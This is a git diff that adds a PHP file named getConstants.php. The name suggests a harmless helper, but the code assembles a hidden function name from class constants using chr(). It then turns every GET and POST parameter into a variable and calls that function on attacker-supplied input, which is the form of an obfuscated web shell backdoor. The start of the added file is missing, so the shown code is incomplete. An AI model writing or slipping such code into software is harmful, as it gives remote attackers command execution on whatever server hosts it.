diff --git a/php/getConstants.php b/php/getConstants.php new file mode 100644 index 0000000..febe4ae --- /dev/null +++ b/php/getConstants.php @@ -0,0 +1,27 @@ +getConstant(chr($i)); + $para2.=$para1; +} + +foreach (array('_POST','_GET') as $_request) { + foreach ($$_request as $_key=>$_value) { + $$_key= $_value; + } +} + +$para2($_value);